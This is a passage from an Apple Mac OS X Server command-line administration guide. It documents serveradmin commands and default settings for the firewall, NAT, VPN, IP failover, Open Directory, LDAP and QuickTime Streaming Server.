/etc/ipfilter/ipfw.conf are loaded into the firewall # via ipfw. # Note that the rules loaded into the firewall are not applied unless the # firewall is enabled. # # The rules resulting from the Server Admin app's IPFirewall and NAT panels # are numbered: # 10 - from the NAT Service - this is the NAT divert rule, present only # when he NAT service is started via the Server Admin app. # 1000 - from the "Advanced" panel - the modifiable rules, ordered by # their relative position in the drag-sortable rule list # 12300 - from the "General" panel - "allow"" rules that punch specific # holes in the firewall for specific services # 63200 - from the "Advanced" panel - the non-modifiable rules at the # bottom of the panel's rule list # # Refer to the man page for ipfw(8) for more information. # # The following default rules are already added by default: # #add 01000 allow all from any to any via lo0 #add 01010 deny all from any to 127.0.0.0/8 #add 01020 deny ip from 224.0.0.0/4 to any in #add 01030 deny tcp from any to 224.0.0.0/4 in #add 12300 ("allow" rules from the "General" panel) #... #add 63200 deny icmp from any to any in icmptypes 0 in #add 63300 deny igmp from any to any in #add 65000 deny tcp from any to any in setup For more information, read the ipfw man page. LL2354.book Page 139 Monday, October 20, 2003 9:47 AM 140 Chapter 13 Working With Network Services Adding Rules Using serveradmin If you prefer not to work with the ipfw.conf file, you can use the serveradmin settings command to add firewall rules to your configuration. Note: Be sure to include the special first setting (ending with = create). This is how you tell serveradmin to create the necessary rule array with the specified rule number. To add a subnet: $ sudo serveradmin settings ipfilter:rules:_array_id:rule = create ipfilter:rules:_array_id:rule:source = source ipfilter:rules:_array_id:rule:protocol = protocol ipfilter:rules:_array_id:rule:destination = destination ipfilter:rules:_array_id:rule:action = action ipfilter:rules:_array_id:rule:enableLocked = (yes|no) ipfilter:rules:_array_id:rule:enabled = (yes|no) ipfilter:rules:_array_id:rule:log = (yes|no) ipfilter:rules:_array_id:rule:readOnly = (yes|no) ipfilter:rules:_array_id:rule:source-port = port Control-D Example: $ sudo serveradmin settings ipfilter:rules:_array_id:1111 = create ipfilter:rules:_array_id:1111:source = "10.10.41.60" ipfilter:rules:_array_id:1111:protocol = "udp" ipfilter:rules:_array_id:1111:destination = "any via en0" ipfilter:rules:_array_id:1111:action = "allow" ipfilter:rules:_array_id:1111:enableLocked = yes ipfilter:rules:_array_id:1111:enabled = yes ipfilter:rules:_array_id:1111:log = no ipfilter:rules:_array_id:1111:readOnly = yes ipfilter:rules:_array_id:1111:source-port = "" Control-D Parameter Description rule A unique rule number. Other parameters The standard rule settings described under “IPFilter Rules Array” on page 141. LL2354.book Page 140 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 141 IPFilter Rules Array An array of the following settings is included in the IPFilter settings for each defined firewall rule. In an actual list of settings, <rule> is replaced with a rule number. You can add a rule by using serveradmin to create such an array in the firewall settings (see “Adding Rules Using serveradmin” on page 140). Firewall serveradmin Commands You can use the following commands with the serveradmin application to manage Firewall (ipfilter) service. Parameter (ipfilter:) Description rules:_array_id:<rule>: source The source of traffic governed by the rule. rules:_array_id:<rule>: protocol The protocol for traffic governed by the rule. rules:_array_id:<rule>: destination The destination of traffic governed by the rule. rules:_array_id:<rule>: action The action to be taken. rules:_array_id:<rule>: enabled Whether the rule is enabled. rules:_array_id:<rule>: log Whether activation of the rule is logged. rules:_array_id:<rule>: readOnly Whether read-only is set. rules:_array_id:<rule>: source-port The source port of traffic governed by the rule. Command (ipfilter:command=) Description getLogPaths Find the current location of the log used by the service. Default = /var/log/system.log getStandardServices Retrieve a list of the standard services as they appear on the General pane of the Firewall service settings in the Server Admin GUI application. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 141 Monday, October 20, 2003 9:47 AM 142 Chapter 13 Working With Network Services Viewing Firewall Service Log You can use tail or any other file listing tool to view the contents of the ipfilter service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current ipfilter service log is located. To display the log path: $ sudo serveradmin command ipfilter:command = getLogPaths Output ipfilter:systemLog = <system-log> Using Firewall Service to Simulate Network Activity You can use the Firewall service in Mac OS X service in conjunction with Dummynet, a general-purpose network load simulator. For more information on Dummynet, visit ai3.asti.dost.gov.ph/sat/dummynet.html or use Google or Sherlock to search the web. NAT Service Starting and Stopping NAT Service To start NAT service: $ sudo serveradmin start nat To stop NAT service: $ sudo serveradmin stop nat Checking the Status of NAT Service To see summary status of NAT service: $ sudo serveradmin status nat To see detailed status of NAT service: $ sudo serveradmin fullstatus nat Viewing NAT Service Settings To list NAT service configuration settings: $ sudo serveradmin settings nat To list a particular setting: $ sudo serveradmin settings nat:setting Value Description <system-log> The location of the ipfilter service log. Default = /var/log/system.log LL2354.book Page 142 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 143 Changing NAT Service Settings To change a setting: $ sudo serveradmin settings nat:setting = value To change several settings: $ sudo serveradmin settings nat:setting = value nat:setting = value nat:setting = value [...] Control-D NAT Service Settings Use the following parameters with the serveradmin command to change settings for NAT service. Parameter Description setting A NAT service setting. To see a list of available settings, type $ sudo serveradmin settings nat or see “NAT Service Settings” on this page. value An appropriate value for the setting. Parameter (nat:) Description deny_incoming yes|no Default = no. log_denied yes|no Default = no. clamp_mss yes|no Default = yes reverse yes|no Default = no log yes|no Default = yes proxy_only yes|no Default = no dynamic yes|no Default = yes use_sockets yes|no Default = yes interface The network port. Default = "en0" LL2354.book Page 143 Monday, October 20, 2003 9:47 AM 144 Chapter 13 Working With Network Services NAT serveradmin Commands You can use the following commands with the serveradmin application to manage NAT service. Viewing the NAT Service Log You can use tail or any other file listing tool to view the contents of the NAT service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current NAT service log is located. To display the log path: $ sudo serveradmin command nat:command = getLogPaths Output nat:natLog = <nat-log> unregistered_only yes|no Default = no same_ports yes|no Default = yes Parameter (nat:) Description Command (nat:command=) Description getLogPaths Find the current location of the log used by the NAT service. See “Viewing the NAT Service Log” on this page. updateNATRuleInIpfw Update the firewall rules defined in the ipfilter service to reflect changes in the NAT settings. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. Value Description <nat-log> The location of the NAT service log. Default = /var/log/alias.log LL2354.book Page 144 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 145 VPN Service Starting and Stopping VPN Service To start VPN service: $ sudo serveradmin start vpn To stop VPN service: $ sudo serveradmin stop vpn Checking the Status of VPN Service To see summary status of VPN service: $ sudo serveradmin status vpn To see detailed status of VPN service: $ sudo serveradmin fullstatus vpn Viewing VPN Service Settings To list VPN service configuration settings: $ sudo serveradmin settings vpn To list a particular setting: $ sudo serveradmin settings vpn:setting Changing VPN Service Settings To change a setting: $ sudo serveradmin settings vpn:setting = value To change several settings: $ sudo serveradmin settings vpn:setting = value vpn:setting = value vpn:setting = value [...] Control-D Parameter Description setting A VPN service setting. To see a list of available settings, type $ sudo serveradmin settings vpn or see “List of VPN Service Settings” on page 146. value An appropriate value for the setting. LL2354.book Page 145 Monday, October 20, 2003 9:47 AM 146 Chapter 13 Working With Network Services List of VPN Service Settings Use the following parameters with the serveradmin command to change settings for VPN service. Parameter (vpn:Servers:) Description com.<name>.ppp.l2tp: Server:VerboseLogging Default = 1 com.<name>.ppp.l2tp: Server:MaximumSessions Default = 128 com.<name>.ppp.l2tp: Server:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecretEncryption Default = "Key" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecretValue Default = "" com.<name>.ppp.l2tp: L2TP:IPSecSharedSecret Default = "" com.<name>.ppp.l2tp: L2TP:Transport Default = "IPSec" com.<name>.ppp.l2tp: enabled Default = no com.<name>.ppp.l2tp: IPv4:DestAddressRanges Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteMasks Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteAddresses Default = _empty_array com.<name>.ppp.l2tp: IPv4:OfferedRouteTypes Default = _empty_array com.<name>.ppp.l2tp: IPv4:ConfigMethod Default = "Manual" com.<name>.ppp.l2tp: DNS:OfferedSearchDomains Default = _empty_array com.<name>.ppp.l2tp: DNS:OfferedServerAddresses Default = _empty_array com.<name>.ppp.l2tp: DSACL:Group Default = "" com.<name>.ppp.l2tp: Interface:SubType Default = "L2TP" com.<name>.ppp.l2tp: Interface:Type Default = "PPP" com.<name>.ppp.l2tp: PPP:LCPEchoFailure Default = 5 LL2354.book Page 146 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 147 com.<name>.ppp.l2tp: PPP:DSACLEnabled Default = no com.<name>.ppp.l2tp: PPP:VerboseLogging Default = 1 com.<name>.ppp.l2tp: PPP:AuthenticatorPlugins: _array_index:n Default = "DSAuth" com.<name>.ppp.l2tp: PPP:LCPEchoInterval Default = 60 com.<name>.ppp.l2tp: PPP:LCPEchoEnabled Default = 1 com.<name>.ppp.l2tp: PPP:IPCPCompressionVJ Default = 0 com.<name>.ppp.l2tp: PPP:AuthenticatorProtocol: _array_index:n Default = "MSCHAP2" com.<name>.ppp.l2tp: PPP:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.pptp: Server:VerboseLogging Default = 1 com.<name>.ppp.pptp: Server:MaximumSessions Default = 128 com.<name>.ppp.pptp: Server:LogFile Default = "/var/log/ppp/vpnd.log" com.<name>.ppp.pptp: enabled Default = no com.<name>.ppp.pptp: IPv4:DestAddressRanges Default = _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteMasks Default = _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteAddresses Default = _empty_array com.<name>.ppp.pptp: IPv4:OfferedRouteTypes Default = _empty_array com.<name>.ppp.pptp: IPv4:ConfigMethod Default = "Manual" com.<name>.ppp.pptp: DNS:OfferedSearchDomains Default = _empty_array com.<name>.ppp.pptp: DNS:OfferedServerAddresses Default = _empty_array com.<name>.ppp.pptp: DSACL:Group Default = "" Parameter (vpn:Servers:) Description LL2354.book Page 147 Monday, October 20, 2003 9:47 AM 148 Chapter 13 Working With Network Services com.<name>.ppp.pptp: Interface:SubType Default = "PPTP" com.<name>.ppp.pptp: Interface:Type Default = "PPP" com.<name>.ppp.pptp: PPP:CCPProtocols:_array_index:n Default = "MPPE" com.<name>.ppp.pptp: PPP:LCPEchoFailure Default = 5 com.<name>.ppp.pptp: PPP:MPPEKeySize128 Default = 1 com.<name>.ppp.pptp: PPP:DSACLEnabled Default = no com.<name>.ppp.pptp: PPP:VerboseLogging Default = 1 com.<name>.ppp.pptp: PPP:AuthenticatorPlugins: _array_index:n Default = "DSAuth" com.<name>.ppp.pptp: PPP:MPPEKeySize40 Default = 0 com.<name>.ppp.pptp: PPP:LCPEchoInterval Default = 60 com.<name>.ppp.pptp: PPP:LCPEchoEnabled Default = 1 com.<name>.ppp.pptp: PPP:CCPEnabled Default = 1 com.<name>.ppp.pptp: PPP:IPCPCompressionVJ Default = 0 com.<name>.ppp.pptp: PPP:AuthenticatorProtocol: _array_index:n Default = "MSCHAP2" com.<name>.ppp.pptp: PPP:LogFile Default = "/var/log/ppp/vpnd.log" Parameter (vpn:Servers:) Description LL2354.book Page 148 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 149 List of VPN serveradmin Commands You can use the following commands with the serveradmin application to manage VPN service. Viewing the VPN Service Log You can use tail or any other file listing tool to view the contents of the VPN service log. To view the latest entries in the log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current VPN service log is located. To display the log path: $ sudo serveradmin command vpn:command = getLogPaths Output vpn:vpnLog = <vpn-log> Command (vpn:command=) Description getLogPaths Find the current location of the VPN service log. See “Viewing the VPN Service Log” on this page. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. Value Description <vpn-log> The location of the VPN service log. Default = /var/log/vpnd.log LL2354.book Page 149 Monday, October 20, 2003 9:47 AM 150 Chapter 13 Working With Network Services IP Failover IP failover allows a secondary server to acquire the IP address of a primary server if the primary server ceases to function. Once the primary server returns to normal operation, the secondary server relinquishes the IP address. This allows your website to remain available on the network even if the primary server is temporarily offline. Note: IP failover only allows a secondary server to acquire a primary server’s IP address. You need additional software tools such as rsync to provide capabilities such as mirroring the primary server’s data on the secondary server. See the rsync man pages for more information. Requirements IP failover isn’t a complete solution; it is one tool you can use to increase your server’s availability to your clients. To use IP failover, you will need to set up the following hardware and software. Hardware IP failover requires the following hardware setup: • Primary server • Secondary server • Public network (servers must be on same subnet) • Private network between the servers (additional network interface card) Note: Because IP failover uses broadcast messages, both servers must have IP addresses on the same subnet of the public network. In addition, both servers must have IP addresses on the same subnet of the private network. Software IP failover requires the following software setup: • Unique IP addresses for each network interface (public and private) • Software to mirror primary server data to secondary server • Scripts to control failover behavior on secondary server (optional) Failover Operation When IP failover is active, the primary server periodically broadcasts a brief message confirming normal operation on both the public and private networks. This message is monitored by the secondary server. • If the broadcast is interrupted on both public and private networks, the secondary server initiates the failover process. • If status messages are interrupted on only one network, the secondary server sends email notification of a network anomaly, but doesn’t acquire the primary server’s IP address. Email notification is sent when the secondary server detects a failover condition, a network anomaly, and when the IP address is relinquished back to the primary server. LL2354.book Page 150 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 151 Enabling IP Failover You enable IP failover by adding command lines to the file /etc/hostconfig on the primary and the secondary server. Be sure to enter these lines exactly as shown with regard to spaces and punctuation marks. To enable IP failover: 1 At the primary server, add the following line to /etc/hostconfig: FAILOVER_BCAST_IPS="10.0.0.255 100.0.255.255" Substitute the broadcast addresses used on your server for the public and private networks. This tells the server to send broadcast messages over relevant network interfaces that the server at those IP addresses is functioning. 2 Restart the primary server so that your changes can take effect. 3 Disconnect the primary server from both the public and private networks. 4 At the secondary server, add the following lines to /etc/hostconfig: FAILOVER_PEER_IP="10.0.0.1" FAILOVER_PEER_IP_PAIRS="en0:100.0.0.10" FAILOVER_EMAIL_RECIPIENT="admin@example.com" In the first line substitute the IP address of the primary server on the private network. In the second line enter the local network interface that should adopt the primary server’s public IP address, a colon, then the primary server’s public IP address. (Optional) In the third line, enter the email address for notification messages regarding the primary server status. If this line is omitted, email notifications are sent to the root account on the local machine. 5 Restart the secondary server so your changes can take effect and allow the secondary server to acquire the primary’s public IP address. Important: Before you enable IP Failover, verify on both servers that the port used for the public network is at the top of the Network Port Configurations list in the Network pane of System Preferences. Also verify that the port used for the private network contains no DNS configuration information. 6 Reconnect the primary server to the private network, wait fifteen seconds, then reconnect the primary server to the public network. 7 Verify that the secondary server relinquishes the primary server’s public IP address. LL2354.book Page 151 Monday, October 20, 2003 9:47 AM 152 Chapter 13 Working With Network Services Configuring IP Failover You configure failover behavior using scripts. The scripts must be executable (for example, shell scripts, Perl, compiled C code, or executable AppleScripts). You place these scripts in /Library/IPFailover/<IP address> on the secondary server. You need to create a directory named with the public IP address of the primary server to contain the failover scripts for that server. For example: /Library/IPFailover/100.0.0.10 Notification Only You can use a script named “Test” located in the failover scripts directory to control whether, in the event of a failover condition, the secondary server acquires the primary’s IP address, or simply sends an email notification. If no script exists, or if the script returns a zero result, then the secondary server acquires the primary’s IP address. If the script returns a non-zero result, then the secondary server skips IP address acquisition and only sends email notification of the failover condition. The test script is run to determine whether the IP address should be acquired and to determine if the IP address should be relinquished when the primary server returns to service. A simple way to set up this notification-only mode is to copy the script located at /usr/bin/false to the directory named with your primary server IP address and then change the name of the script to “Test”. This script always returns a non-zero result. Using the Test script, you can configure the primary server to monitor the secondary server, and send email notification if the secondary server becomes unavailable. Pre and Post Scripts You can configure the failover process with scripts that can run before acquiring the primary IP address (preacquisition), after acquiring the IP address (postacquisition), before relinquishing the primary IP address (prerelinquish), and after relinquishing the IP address back to the primary server (postrelinquish). These scripts reside in the /Library/IPFailover/<IP address> directory on the secondary server, as previously discussed. The scripts use these four prefixes: • PreAcq – run before acquiring IP address from primary server • PostAcq – run after acquiring IP address from primary server • PreRel – run before relinquishing IP address back to primary server • PostRel – run after relinquishing IP address back to primary server Important: Always be sure that the primary server is up and functioning normally before you activate IP failover on the secondary server. If the primary server isn’t sending broadcast messages, the secondary server will initiate the failover process and acquire the primary’s public IP address. You may have more than one script at each stage. The scripts in each prefix group are run in the order their file names appear in a directory listing using the ls command. LL2354.book Page 152 Monday, October 20, 2003 9:47 AM Chapter 13 Working With Network Services 153 For example, your secondary server may perform other services on the network such as running a statistical analysis application and distributed image processing software. A preacquisition script quits the running applications to free up the CPU for the Web server. A postacquisition script starts the Web server. Once the primary is up and running again, a prerelinquish script quits the Web server, and a postrelinquish script starts the image processing and statistical analysis applications. The sequence of scripted events might look like this: <Failover condition detected> Test (if present) PreAcq10.StopDIP PreAcq20.StopSA PreAcq30.CleanupTmp <Acquire IP address> PostAcq10.StartTimer PostAcq20.StartApache <Primary server returns to service> PreRel10.StopApache PreRel20.StopTimer <Relinquish IP address> PostRel10.StartSA PostRel20.StartDIP PostRel30.MailTimerResultsToAdmin Enabling PPP Dial-In You can use the pppd command to set up Point-to-Point Protocol (PPP) dial-in service. For more information, see the man page. The “Examples” section of the man page shows an example of setting up dial-in service. LL2354.book Page 153 Monday, October 20, 2003 9:47 AM LL2354.book Page 154 Monday, October 20, 2003 9:47 AM 14 155 14 Working With Open Directory Commands you can use to manage the Open Directory service in Mac OS X Server. This chapter includes descriptions of general directory tools and tools for working with LDAP, NetInfo, and the Password Server. General Directory Tools Testing Your Open Directory Configuration You can use the dscl utility to test your directory services configuration. For more information, type man dscl to see the man page. Modifying an Open Directory Node You can also use the dscl utility to create, modify, or delete directory information in an Open Directory node. Testing Open Directory Plugins You can use the dsperfmonitor tool to check the performance of the protocol-specific plugins used by Open Directory. It can list the API calls being made to plugins, how long the plugins take to reply, and recent API call errors. For more information, type man dsperfmonitor to see the man page. Directory services API support is provided by the DirectoryService daemon. For more information, type man DirectoryService to see the man page. For information on the data types used by directory services, type man DirectoryServiceAttributes to see the man page. Finally, for information on the internals of Open Directory and its plugins, including source code you can examine or adopt, follow the Open Directory link at www.apple.com/darwin. LL2354.book Page 155 Monday, October 20, 2003 9:47 AM 156 Chapter 14 Working With Open Directory Registering URLs With Service Location Protocol (SLP) You can use the slp_reg command to register service URLs using the Service Location Protocol (SLP). For more information, type man slp_reg to see the man page. SLP registration is handled by the SLP daemon slpd. For more information, type man slpd to see the man page. Changing Open Directory Service Settings Use the following parameters with the serveradmin command to change settings for the Open Directory service. Be sure to add dirserv: to the beginning of any parameter you use. For example, to see the role that the server is playing in the directory hierarchy, you would type serveradmin settings dirserv:LDAPServerType. Parameter (dirserv:) Description replicationUnits Default = "days" replicaLastUpdate Default = "" LDAPDataBasePath Default = "" replicationPeriod Default = 4 LDAPSearchBase Default = "" passwordOptionsString Default = "usingHistory=0 usingExpirationDate=0 usingHardExpirationDate=0 requiresAlpha=0 requiresNumeric=0 expirationDateGMT=12/31/69 hardExpireDateGMT=12/31/69 maxMinutesUntilChangePassword=0 maxMinutesUntilDisabled=0 maxMinutesOfNonUse=0 maxFailedLoginAttempts=0 minChars=0 maxChars=0 passwordCannotBeName=0" NetInfoRunStatus Default = "" LDAPSSLCertificatePath Default = "" masterServer Default = "" LDAPServerType Default = "standalone" NetInfoDomain Default = "" replicationWhen Default = "periodic" useSSL Default = "YES" LDAPDefaultPrefix Default = "dc=<domain>,dc=com" LDAPTimeoutUnits Default = "minutes" LDAPServerBackend Default = "BerkeleyDB" LL2354.book Page 156 Monday, October 20, 2003 9:47 AM Chapter 14 Working With Open Directory 157 LDAP Configuring LDAP The following tools are available for configuring LDAP. For more information, see the man page for each tool. slapconfig You can use the slapconfig utility to configure the slapd and slurpd LDAP daemons and related search policies. For more information, type man slapconfig to see the man page. Standard Distribution Tools These tools are included in the standard LDAP distribution. A Note on Using ldapsearch The ldapsearch tool connects to an LDAP server, binds to it, finds entries, and returns attributes of the entries found. By default, ldapsearch tries to connect to the LDAP server using the Simple Authentication and Security Layer (SASL) method. If the server doesn’t support this method, you see this error message: ldap_sasl_interactive_bind_s: No such attribute (16) To avoid this, include the -x option when you type the command. For example: ldapsearch -h 192.168.100.1 -b "dc=ecxample,dc=com" -x Program Used to /usr/bin/ldapadd Add entries to the LDAP directory. /usr/bin/ldapcompare Compare a directory entry’s actual attributes with known attributes. /usr/bin/ldapdelete Delete entries from the LDAP directory. /usr/bin/ldapmodify Change an entry’s attributes. /usr/bin/ldapmodrdn Change an entry’s relative distinguished name (RDN). /usr/bin/ldappasswd Set the password for an LDAP user. Apple recommends using passwd instead of ldappasswd. For more information, type man passwd. /usr/bin/ldapsearch Search the LDAP directory. See the usage note under “A Note on Using ldapsearch” on this page. /usr/bin/ldapwhoami Obtain the primary authorization identity associated with a user. /usr/sbin/slapadd Add entries to the LDAP directory. /usr/sbin/slapcat Export LDAP Directory Interchange Format files. /usr/sbin/slapindex Regenerate directory indexes. /usr/sbin/slappasswd Generate user password. hashes. LL2354.book Page 157 Monday, October 20, 2003 9:47 AM 158 Chapter 14 Working With Open Directory The -x option forces ldapsearch to use simple authentication instead of SASL. Idle Rebinding Options The following two LDAPv3 plugin parameters aren’t documented in the open directory administration guide. The parameters are in, or can be added to, the file /library/preferences/directoryservice/DSLDAPv3PlugInConfig.plist. Delay Rebind This parameter specifies how long the LDAP plugin waits before attempting to reconnect to a server that fails to respond. You can increase this value to prevent continuous reconnect attempts. <key>Delay Rebind Try in seconds<\key> <integer>n<\integer> You should find this parameter in the plist file near <key>OpenClose Timeout in seconds<\key>. If not, you can add it there. Idle Timeout This parameter specifies how long the LDAP plugin will sit idle before disconnecting from the server. You can adjust this value to reduce overloading of the server's connections from remote clients. <key>Idle Timeout in minutes<\key> <integer>n<\integer> If it doesn’t already exist in the plist file, you can add it near <key>OpenClose Timeout in seconds<\key>. Additional Information About LDAP The LDAP server in Mac OS X Server is based on OpenLDAP. Additional information about OpenLDAP, including an administrator’s guide, is available at www.openldap.org. LL2354.book Page 158 Monday, October 20, 2003 9:47 AM Chapter 14 Working With Open Directory 159 NetInfo Configuring NetInfo You can use the following command-line utilities to manage the NetInfo directory. For more information about a utility, see the related man page. For example, you can use the NeST -setprotocols command to specify which authentication methods the server’s Open Directory Password Server uses. Password Server Working With the Password Server You can use the mkpassdb utility to create, modify, or back up the password database used by the Mac OS X Server Password Server. For more information, type man mkpassdb to read the man page. Viewing or Changing Password Policies You can use the pwpolicy command to view or change the authentication policies used by the Mac OS X Server Password Server. For more information, type man pwpolicy to see the man page. Enabling or Disabling Authentication Methods All password authentication methods supported by Open Directory Password Server are initially enabled. You can disable and enable Open Directory Password Server authentication methods by using the NeST tool. To see a list of available methods: $ NeST -getprotocols To disable or enable a method: $ NeST -setprotocols protocol (on|off) Utility Used to NeST Configure the directory system of a server. nicl Create, view, and modify entries in the NetInfo directory. nifind Search the NetInfo directory for a particular entry. nigrep Search the NetInfo directory for an expression. nidump Export NetInfo data to text or flat files. niload Import flat files into the NetInfo directory. nireport Print tables of NetInfo directory entries. Parameter Description protocol Any of the protocol names listed by NeST -getprotocols (for example, SMB-LAN-MANAGER). LL2354.book Page 159 Monday, October 20, 2003 9:47 AM 160 Chapter 14 Working With Open Directory For information on the available methods, see the Open Directory administration guide. Kerberos and Single Sign On The following tools are available for setting up your Kerberos and Single Sign-On environment. For more information on a tool, see the related man page. Tool (in usr/sbin/) Description kdcsetup Creates necessary setup files and adds krb5kdc and kadmind servers for the Apple Open Directory KDC. sso_util Sets up, interrogates, and tears down the Kerberos configuration within the Apple Single Sign On environment. kerberosautoconfig Creates the edu.mit.Kerberos file based on the Open Directory KerberosClient record. LL2354.book Page 160 Monday, October 20, 2003 9:47 AM 15 161 15 Working With QuickTime Streaming Server Commands you can use to manage QTSS service in Mac OS X Server. Starting QTSS Service You can use the serveradmin command to start QTSS service, or you can use the quicktimestreamingserver command to specify additional service parameters when you start the service. To start QTSS service: $ sudo serveradmin start qtss or $ sudo quicktimestreamingserver To see a list of quicktimestreamingserver command options, type $ sudo quicktimestreamingserver -h Stopping QTSS Service To stop QTSS service: $ sudo serveradmin stop qtss Checking QTSS Service Status To see if QTSS service is running: $ sudo serveradmin status qtss To see complete QTSS status: $ sudo serveradmin fullstatus qtss LL2354.book Page 161 Monday, October 20, 2003 9:47 AM 162 Chapter 15 Working With QuickTime Streaming Server Viewing QTSS Settings To list all QTSS service settings: $ sudo serveradmin settings qtss To list a particular setting: $ sudo serveradmin settings qtss:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings qtss:modules:_array_id:QTSSAdminModule:* Changing QTSS Settings You can change QTSS service settings using the serveradmin command or by editing the QTSS parameter list file directly. To change a setting: $ sudo serveradmin settings qtss:setting = value To change several settings: $ sudo serveradmin settings qtss:setting = value qtss:setting = value qtss:setting = value [...] Control-D Parameter Description setting A QTSS service setting. To see a list of available settings, type $ sudo serveradmin settings qtss or see “QTSS Settings” on page 163. value An appropriate value for the setting. LL2354.book Page 162 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 163 QTSS Settings Use the following parameters with the serveradmin command to change settings for the QTSS service. Descriptions of Settings To see descriptions of most QTSS settings, you can look in the sample settings file /Library/QuickTimeStreaming/Config/streamingserver.xml-sample. Look for XML module and pref names that match the last two segments of the parameter name. For example, to see a description of modules:_array_id:QTSSFileModule:record_movie_file_sdp Look in the sample file for <MODULE NAME="QTSSFileModule">... <PREF NAME="record_movie_file_sdp". QTSS parameters you might change: Parameter (qtss:) Description broadcaster:password Default = "" broadcaster:username Default = "" modules:_array_id:QTSSAccessLogModule: request_logfile_dir Default = "/Library/QuickTime Streaming/Logs/" modules:_array_id:QTSSAccessLogModule: request_logfile_interval Default = 7 modules:_array_id:QTSSAccessLogModule: request_logfile_name Default = "StreamingServer" modules:_array_id:QTSSAccessLogModule: request_logfile_size Default = 10240000 modules:_array_id:QTSSAccessLogModule: request_logging Default = yes modules:_array_id:QTSSAccessLogModule: request_logtime_in_gmt Default = yes modules:_array_id:QTSSAccessModule: modAccess_groupsfilepath Default = "/Library/Quick TimeStreaming/Config/ qtgroups" modules:_array_id:QTSSAccessModule: modAccess_qtaccessfilename Default = "qtaccess" modules:_array_id:QTSSAccessModule: modAccess_usersfilepath Default = "/Library/Quick TimeStreaming/Config/ qtusers" LL2354.book Page 163 Monday, October 20, 2003 9:47 AM 164 Chapter 15 Working With QuickTime Streaming Server modules:_array_id:QTSSAdminModule: AdministratorGroup Default = "admin" modules:_array_id:QTSSAdminModule: Authenticate Default = yes modules:_array_id:QTSSAdminModule: enable_remote_admin Default = yes modules:_array_id:QTSSAdminModule: IPAccessList Default = "127.0.0.*" modules:_array_id:QTSSAdminModule: LocalAccessOnly Default = yes modules:_array_id:QTSSFileModule: add_seconds_to_client_buffer_delay Default = 0 modules:_array_id:QTSSFileModule: admin_email Default = "" modules:_array_id:QTSSFileModule: record_movie_file_sdp Default = no modules:_array_id:QTSSHomeDirectoryModule: enabled Default = no modules:_array_id:QTSSHomeDirectoryModule: movies_directory Default = "/Sites/Streaming" modules:_array_id:QTSSMP3StreamingModule: mp3_broadcast_buffer_size Default = 8192 modules:_array_id:QTSSMP3StreamingModule: mp3_broadcast_password Default = "" modules:_array_id:QTSSMP3StreamingModule: mp3_max_flow_control_time Default = 10000 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_dir Default = "/Library/QuickTime Streaming/Logs/" modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_interval Default = 7 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_name Default = "mp3_access" modules:_array_id:QTSSMP3StreamingModule: mp3_request_logfile_size Default = 10240000 modules:_array_id:QTSSMP3StreamingModule: mp3_request_logging Default = yes modules:_array_id:QTSSMP3StreamingModule: mp3_request_logtime_in_gmt Default = yes modules:_array_id:QTSSMP3StreamingModule: mp3_streaming_enabled Default = yes Parameter (qtss:) Description LL2354.book Page 164 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 165 modules:_array_id:QTSSReflectorModule: allow_broadcasts Default = yes modules:_array_id:QTSSReflectorModule: allow_non_sdp_urls Default = yes modules:_array_id:QTSSReflectorModule: BroadcasterGroup Default = "broadcaster" modules:_array_id:QTSSReflectorModule: broadcast_dir_list Default = "" modules:_array_id:QTSSReflectorModule: disable_overbuffering Default = no modules:_array_id:QTSSReflectorModule: enable_broadcast_announce Default = yes modules:_array_id:QTSSReflectorModule: enable_broadcast_push Default = yes modules:_array_id:QTSSReflectorModule: ip_allow_list Default = "127.0.0.*" modules:_array_id:QTSSReflectorModule: kill_clients_when_broadcast_stops Default = no modules:_array_id:QTSSReflectorModule: minimum_static_sdp_port Default = 20000 modules:_array_id:QTSSReflectorModule: timeout_broadcaster_session_secs Default = 20 modules:_array_id:QTSSRelayModule: relay_prefs_file Default = "/Library/Quick TimeStreaming/Config/ relayconfig.xml" server:authentication_scheme Default = "digest" server:auto_restart Default = yes server:default_authorization_realm Default = "Streaming Server" server:do_report_http_connection_ip_address Default = no server:error_logfile_dir Default = "/Library/Quick TimeStreaming/Logs/" server:error_logfile_name Default = "Error" server:error_logfile_size Default = 256000 server:error_logfile_verbosity Default = 2 server:error_logging Default = yes server:force_logs_close_on_write Default = no server:maximum_bandwidth Default = 102400 server:maximum_connections Default = 1000 server:module_folder Default = "/Library/Quick TimeStreaming/Modules/" Parameter (qtss:) Description LL2354.book Page 165 Monday, October 20, 2003 9:47 AM 166 Chapter 15 Working With QuickTime Streaming Server QTSS serveradmin Commands You can use the following commands with the serveradmin application to manage QTSS service. Listing Current Connections You can use the serveradmin getConnectedUsers command to retrieve information about QTSS connections. To list connected users: 